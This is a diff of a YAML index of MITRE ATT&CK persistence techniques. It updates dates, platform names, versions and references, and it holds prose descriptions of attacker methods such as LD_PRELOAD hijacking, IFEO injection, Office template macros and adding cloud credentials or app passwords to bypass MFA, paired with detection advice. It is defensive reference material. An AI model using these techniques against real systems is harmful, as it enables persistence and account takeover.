-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30816,13 +31241,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30899,12 +31321,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30923,6 +31344,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30930,7 +31352,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30950,29 +31371,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -31049,12 +31472,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -31069,6 +31491,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -31077,18 +31500,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -31120,9 +31543,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -31194,7 +31614,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -31221,7 +31640,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -31247,13 +31666,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -31374,7 +31791,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -31446,7 +31862,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -31516,7 +31931,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -31626,7 +32040,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -31680,7 +32093,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31713,8 +32126,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31745,7 +32156,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31780,12 +32191,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31862,7 +32271,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31916,7 +32324,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31948,7 +32355,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31978,55 +32385,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -32057,6 +32419,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -32066,9 +32429,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -32076,11 +32443,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -32112,7 +32515,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -32160,13 +32563,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -32179,16 +32580,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -32200,16 +32601,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -32264,7 +32665,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -32325,7 +32725,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -32401,7 +32800,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -32429,8 +32828,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -32456,7 +32853,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32481,23 +32878,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -32507,11 +32902,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -32522,12 +32921,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -32536,6 +32942,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32544,13 +32951,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -32576,10 +32986,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
